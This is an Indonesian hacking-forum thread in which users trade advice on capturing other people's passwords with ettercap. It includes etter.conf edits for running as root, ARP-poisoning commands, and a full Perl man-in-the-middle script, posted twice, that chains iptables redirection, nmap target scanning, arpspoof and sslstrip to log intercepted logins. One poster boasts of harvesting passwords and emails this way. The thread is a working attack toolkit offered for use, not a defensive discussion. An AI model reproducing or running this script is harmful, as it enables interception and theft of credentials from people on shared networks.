sniffing ettercap, pass : NULL
#11
coba diedit dulu etter.conf nya

UID=0 > ane liat UID=65534


#12
jadi " UID = 0 " , gitu ya om ?

kalo GID nya dah bener belom ?

#13
(05-06-2012, 11:02 PM)apuse71 Wrote: jadi " UID = 0 " , gitu ya om ?

kalo GID nya dah bener belom ?

gini om ente ketik
gedit /etc/etter.conf

tarkebuka tuh kaya gini

############################################################################
# #
# ettercap -- etter.conf -- configuration file #
# #
# Copyright © ALoR & NaGA #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
# $Id: etter.conf,v 1.78 2004/10/12 15:28:38 alor Exp $ #
# #
############################################################################

[privs]
ec_uid = 0 # 65534 nobody is the default
ec_gid = 0 # 65534 nobody is the default


ane biasa kaya gitu dan berhasil dapet password and email
lihat tulisan yang hijau Big Grin itu yang di edit semoga membantu

#14
Aku dah sering ikuti langkah2 di atas, udah install ulang ettercap, edit file etter.conf tapi kok tidak pernah dapat yang http yah? cuma dapat DHCP terus menerus Big Grin
aku pakai yang ini ettercap -T -q -i wlan0 -M ARP // //
Mohon bantuannya Big Grin
Backtrack
Kisah tentang kita dan Linux

#15
(05-12-2012, 04:55 PM)Backtrack Dragon Wrote: Aku dah sering ikuti langkah2 di atas, udah install ulang ettercap, edit file etter.conf tapi kok tidak pernah dapat yang http yah? cuma dapat DHCP terus menerus Big Grin
aku pakai yang ini ettercap -T -q -i wlan0 -M ARP // //
Mohon bantuannya Big Grin

coba kemari
http://forum.indonesianbacktrack.or.id/s...=dns_spoof

atau pake script ini
Code:
#! /usr/bin/perl -w

#########################################################################
# Script Created By:
# Cypherround
#
# Man In The Middle Attack
# IPtables + Arpspoof + SSLStrip
#
# http://cypherround.blogspot.com
#########################################################################

use strict;
use warnings;

# open /etc/etter.conf and uncomment
# iptables redirect on/off
# ctrl+o to save changes
# ctrl+x to exit nano and continue with script

my $tables;
print "########################################\n";
print "You will have to uncomment iptables redirect.\n";
print "Inside nano use ctrl+o to save your changes & ctrl+x to exit and continue the script.\n";
print "Would you like to open /etc/etter.conf to uncomment iptables redirect? (y/n)\n";
$tables=<STDIN>;
chomp($tables);
    if ($tables eq "y"){
        print "press ctrl+x to exit nano";
        system ("sudo nano /etc/etter.conf");
    }

# change iptables to allow redirection from port 80 to port 8080
my $redirect;
print "########################################\n";
print "Changing iptables to redirect traffic from port 80 to port 8080\n";
$redirect=`sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080`;

# check to make sure ip forwarding is enabled
my $forward;
print "########################################\n";
print "Checking to make sure ip forwarding is enabled\n";
system ("cat /proc/sys/net/ipv4/ip_forward");
print "Does ip forward = 0? (y/n)\n";
$forward=<STDIN>;
chomp($forward);
    if ($forward eq "y"){
        system ("sudo nano /proc/sys/net/ipv4/ip_forward");
        system ("cat /proc/sys/net/ipv4/ip_forward");
}

# check to find out what the default gateway is
my $default;
print "########################################\n";
system ("netstat -nr");
    print "What is the default gateway?\n";
    $default=<STDIN>;
    chomp($default);

# check which network interface device
my $interface;
print "########################################\n";
system ("ifconfig");
    print "Which network interface would you like to use?\n";
    $interface=<STDIN>;
    chomp($interface);

# check what your ip address is
my $ip;
print "########################################\n";
system ("ifconfig $interface");
    print "What is your IP address?\n";
    $ip=<STDIN>;
    chomp($ip);

# option to run nmap scan for a target
my $nmap;
my $netip;
print "########################################\n";
print "Would you like to run an nmap scan of the network to find a target? (y/n)\n";
    $nmap=<STDIN>;
    chomp($nmap);
    if ($nmap eq "y"){
        print "Enter the IP to scan then entire network (ex: 192.168.1.*)\n";
            $netip=<STDIN>;
            chomp($netip);
            system ("nmap -v -PN $netip");
}

# start arpspoof; option to spoof a target or spoof the entire network
my $arp;
my $target;
print "########################################\n";
print "Do you want to spoof a specific target? (y/n)\n";
    $arp=<STDIN>;
    chomp($arp);
        if ($arp eq "y"){
            print "Enter the IP of the Target: \n";
            $target=<STDIN>;
            chomp($target);
                system ("xterm -e sudo arpspoof -i $interface -t $target $default &");
        }
        else {
            system ("xterm -e sudo arpspoof -i $interface $default &");
        }

# start ssl strip
my $ssl;
my $log;
print "########################################\n";
print "Starting SSL Strip.\n";
print "We have a few options for our parameters with SSL Strip.\n";
print "Here are you options: \nsniff all traffic, kill active sessions, log data (akl) \nkill, log, and sniff only https traffic (kl) \nlog https traffic only(l)\n";
    $ssl=<STDIN>;
    chomp($ssl);
print "Enter name of the log file, it has to end with '.log'? (ex: strip.log )\n";
    $log=<STDIN>;
    chomp($log);
        if ($ssl eq "akl"){
            system ("xterm -e sudo sslstrip -a -k -l 8080 -w $log &");
        }
        if ($ssl eq "kl"){
            system ("xterm -e sudo sslstrip -k -l 8080 -w $log &");
        }
        elsif ($ssl eq "l"){
            system ("xterm -e sudo sslstrip -l 8080 -w $log &");
        }

# start following the sslstrip log using tail
my $tail;
print "########################################\n";
print "Do you want to start to follow the log file in real time? (y/n)\n";
    $tail=<STDIN>;
    chomp($tail);    
    if ($tail eq "y"){
        print "Starting to tail the sslstrip log file.\n";
        system ("xterm -e sudo tail -f $log &");
    }
    else {
        print "Script done. Time to wait.\n";
    }

save pake format .pl
terus jalaninnya gini
[email protected]# perl auto_mitm.pl

#16
(05-12-2012, 06:33 PM)xsan-lahci Wrote:
(05-12-2012, 04:55 PM)Backtrack Dragon Wrote: Aku dah sering ikuti langkah2 di atas, udah install ulang ettercap, edit file etter.conf tapi kok tidak pernah dapat yang http yah? cuma dapat DHCP terus menerus Big Grin
aku pakai yang ini ettercap -T -q -i wlan0 -M ARP // //
Mohon bantuannya Big Grin

coba kemari
http://forum.indonesianbacktrack.or.id/s...=dns_spoof

atau pake script ini
Code:
#! /usr/bin/perl -w

#########################################################################
# Script Created By:
# Cypherround
#
# Man In The Middle Attack
# IPtables + Arpspoof + SSLStrip
#
# http://cypherround.blogspot.com
#########################################################################

use strict;
use warnings;

# open /etc/etter.conf and uncomment
# iptables redirect on/off
# ctrl+o to save changes
# ctrl+x to exit nano and continue with script

my $tables;
print "########################################\n";
print "You will have to uncomment iptables redirect.\n";
print "Inside nano use ctrl+o to save your changes & ctrl+x to exit and continue the script.\n";
print "Would you like to open /etc/etter.conf to uncomment iptables redirect? (y/n)\n";
$tables=<STDIN>;
chomp($tables);
    if ($tables eq "y"){
        print "press ctrl+x to exit nano";
        system ("sudo nano /etc/etter.conf");
    }

# change iptables to allow redirection from port 80 to port 8080
my $redirect;
print "########################################\n";
print "Changing iptables to redirect traffic from port 80 to port 8080\n";
$redirect=`sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080`;

# check to make sure ip forwarding is enabled
my $forward;
print "########################################\n";
print "Checking to make sure ip forwarding is enabled\n";
system ("cat /proc/sys/net/ipv4/ip_forward");
print "Does ip forward = 0? (y/n)\n";
$forward=<STDIN>;
chomp($forward);
    if ($forward eq "y"){
        system ("sudo nano /proc/sys/net/ipv4/ip_forward");
        system ("cat /proc/sys/net/ipv4/ip_forward");
}

# check to find out what the default gateway is
my $default;
print "########################################\n";
system ("netstat -nr");
    print "What is the default gateway?\n";
    $default=<STDIN>;
    chomp($default);

# check which network interface device
my $interface;
print "########################################\n";
system ("ifconfig");
    print "Which network interface would you like to use?\n";
    $interface=<STDIN>;
    chomp($interface);

# check what your ip address is
my $ip;
print "########################################\n";
system ("ifconfig $interface");
    print "What is your IP address?\n";
    $ip=<STDIN>;
    chomp($ip);

# option to run nmap scan for a target
my $nmap;
my $netip;
print "########################################\n";
print "Would you like to run an nmap scan of the network to find a target? (y/n)\n";
    $nmap=<STDIN>;
    chomp($nmap);
    if ($nmap eq "y"){
        print "Enter the IP to scan then entire network (ex: 192.168.1.*)\n";
            $netip=<STDIN>;
            chomp($netip);
            system ("nmap -v -PN $netip");
}

# start arpspoof; option to spoof a target or spoof the entire network
my $arp;
my $target;
print "########################################\n";
print "Do you want to spoof a specific target? (y/n)\n";
    $arp=<STDIN>;
    chomp($arp);
        if ($arp eq "y"){
            print "Enter the IP of the Target: \n";
            $target=<STDIN>;
            chomp($target);
                system ("xterm -e sudo arpspoof -i $interface -t $target $default &");
        }
        else {
            system ("xterm -e sudo arpspoof -i $interface $default &");
        }

# start ssl strip
my $ssl;
my $log;
print "########################################\n";
print "Starting SSL Strip.\n";
print "We have a few options for our parameters with SSL Strip.\n";
print "Here are you options: \nsniff all traffic, kill active sessions, log data (akl) \nkill, log, and sniff only https traffic (kl) \nlog https traffic only(l)\n";
    $ssl=<STDIN>;
    chomp($ssl);
print "Enter name of the log file, it has to end with '.log'? (ex: strip.log )\n";
    $log=<STDIN>;
    chomp($log);
        if ($ssl eq "akl"){
            system ("xterm -e sudo sslstrip -a -k -l 8080 -w $log &");
        }
        if ($ssl eq "kl"){
            system ("xterm -e sudo sslstrip -k -l 8080 -w $log &");
        }
        elsif ($ssl eq "l"){
            system ("xterm -e sudo sslstrip -l 8080 -w $log &");
        }

# start following the sslstrip log using tail
my $tail;
print "########################################\n";
print "Do you want to start to follow the log file in real time? (y/n)\n";
    $tail=<STDIN>;
    chomp($tail);    
    if ($tail eq "y"){
        print "Starting to tail the sslstrip log file.\n";
        system ("xterm -e sudo tail -f $log &");
    }
    else {
        print "Script done. Time to wait.\n";
    }

save pake format .pl
terus jalaninnya gini
[email protected]# perl auto_mitm.pl

Udah di coba script di atas, jawabannya gini, gak ngerti maksudnya.
[email protected]:~/bash# perl auto_mitm.pl
########################################
You will have to uncomment iptables redirect.
Inside nano use ctrl+o to save your changes & ctrl+x to exit and continue the script.
Would you like to open /etc/etter.conf to uncomment iptables redirect? (y/n)
Backtrack
Kisah tentang kita dan Linux

#17
nah ente udah di ilangin belom tanda pager di etter.confnya kalo belom ente ketik y aja tar automatic di ubah hmmm use google translate om SmileSmile

#18
(05-13-2012, 12:19 AM)xsan-lahci Wrote: nah ente udah di ilangin belom tanda pager di etter.confnya kalo belom ente ketik y aja tar automatic di ubah hmmm use google translate om SmileSmile

Udah di hilangin kok sebelum pakai kode di atas. ini kan maksudnya
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Backtrack
Kisah tentang kita dan Linux

#19
ssl strip nya kaya ny tuh om, Big Grin kalo ga salah ya,,





Users browsing this thread: 1 Guest(s)